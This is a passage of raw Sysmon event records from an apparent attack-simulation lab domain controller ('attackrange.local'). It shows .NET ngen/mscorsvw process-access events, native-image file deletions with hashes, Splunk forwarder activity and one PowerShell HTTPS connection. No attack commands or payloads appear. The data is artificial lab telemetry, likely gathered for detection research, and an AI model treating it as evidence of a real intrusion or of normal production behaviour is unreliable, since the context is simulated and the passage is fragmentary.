ework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.905{4DB9351A-A288-60D3-F205-00000000CF01}4388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AH8KR827TP\System.Web.DataVisualization.Design.ni.dll.auxMD5=DF2BF6BA3AC3F817DE10103F3B86BF21,SHA256=59992D9C440D67C2F6BD3915CB8C19925D94A8D47C0125F2B5907456D3BC5810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.905{4DB9351A-A288-60D3-F205-00000000CF01}4388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AH8KR827TP\System.Web.DataVisualization.Design.ni.dllMD5=9E572569DE50C340DCF9C97CD11ADF65,SHA256=B913608D0C6B3660564C2E9CEB29B7EE9C12DC149E2706F6EF8BB17AB0FE8A22,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.889{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-F205-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.873{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-F205-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.873{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-F205-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.858{4DB9351A-A288-60D3-F105-00000000CF01}2380NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\261L6YIP6W\System.Web.DataVisualization.ni.dll.auxMD5=EE5770146D99024CF1BCA059361F68D2,SHA256=F42896EEA005429457BE7BC36FE662F7BC7025FFEF04995EB952E730B5B33E7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.858{4DB9351A-A288-60D3-F105-00000000CF01}2380NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\261L6YIP6W\System.Web.DataVisualization.ni.dllMD5=65A29AD9071E4558B64E9A4C44D107BE,SHA256=F886F9BF5C4B89892ED483BB8ACF6329E17D9672167C5FDECA214A679E46A967,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.608{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-F105-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.592{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-F105-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.592{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-F105-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.592{4DB9351A-A288-60D3-F005-00000000CF01}3124NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\T1O3YWJDBW\System.Web.ApplicationServices.ni.dll.auxMD5=7831C7253385200EE25B51B94A09811E,SHA256=51BF7E221DCAC6064F40E66EFED64455EAB2DE0D6A0596948A46929E82C821B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.592{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFF953F207FA553867BB3D64E8B46F0F,SHA256=0DB8B9EA5D1B8E6838BFBEFCA21D881587F0431F08E8C519B6225B40CE90F455,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.592{4DB9351A-A288-60D3-F005-00000000CF01}3124NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\T1O3YWJDBW\System.Web.ApplicationServices.ni.dllMD5=CF1A722F6B634B7B5BF69CA3CD8BA577,SHA256=B3874FD5A7A84FB653C2A7144A476BCD7F7E24CB7B2F5E49553FA5DB3287FA27,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.498{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-F005-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.483{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-F005-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.483{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-F005-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.483{4DB9351A-A288-60D3-EF05-00000000CF01}2072NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VIXJPS9QYX\System.Web.Abstractions.ni.dll.auxMD5=FBDE86C920730A79F1930D11AB099405,SHA256=53EC03D1D117E346BF74E814D76317EB177DE3C42580CC0821267A8AF42903EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.483{4DB9351A-A288-60D3-EF05-00000000CF01}2072NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VIXJPS9QYX\System.Web.Abstractions.ni.dllMD5=F3206AFE4AD65610863348D2BB30FDE2,SHA256=631917923E9AFEA3F42D590C1ADAD08FDAED8E3B271AD760541C8968251BC38F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.467{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-EF05-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.451{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-EF05-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.451{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-EF05-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.451{4DB9351A-A288-60D3-EE05-00000000CF01}6316NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\K4GSOCN1R1\System.Speech.ni.dll.auxMD5=D139F65E884AAD054DA9ACA631D92E0C,SHA256=8C033D6EAF1B49418392DDE685226ADBAEC90885CA432F28FFDA2C7C93381537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.451{4DB9351A-A288-60D3-EE05-00000000CF01}6316NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\K4GSOCN1R1\System.Speech.ni.dllMD5=5706DE7C99CC220743EFD6B4233EA785,SHA256=E8DEFEEE0F465B510DB6049B23F55A35EBB45D18FBA91B0E32B1C90DCA8757E8,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000023818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.194{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local50547- 354300x800000000000000023817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.762{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61467-false72.21.81.200-443https 23542300x800000000000000023816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.326{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=148AD9B16C7909989FC35004C1F43F2F,SHA256=17070295C5F8AC4FCFFAFFD0E8E92E369F8899E90733F13B06D3930F4468B033,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-EE05-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.311{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-EE05-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.311{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-EE05-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.295{4DB9351A-A288-60D3-ED05-00000000CF01}1100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LPUIL8NR85\System.ServiceModel.Web.ni.dll.auxMD5=67357164665CE1CAB14C93E073AD4EDB,SHA256=97D23D3A59AB709A21D7C668D0034A46931D212A5724B379F21CCE3FD84342F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.295{4DB9351A-A288-60D3-ED05-00000000CF01}1100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LPUIL8NR85\System.ServiceModel.Web.ni.dllMD5=9DD0499A06E568122837774520154421,SHA256=7E8BEE13571BADD476DBBF491A6751B76B1B66F02B5F9940F7F185F545E1ACF9,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 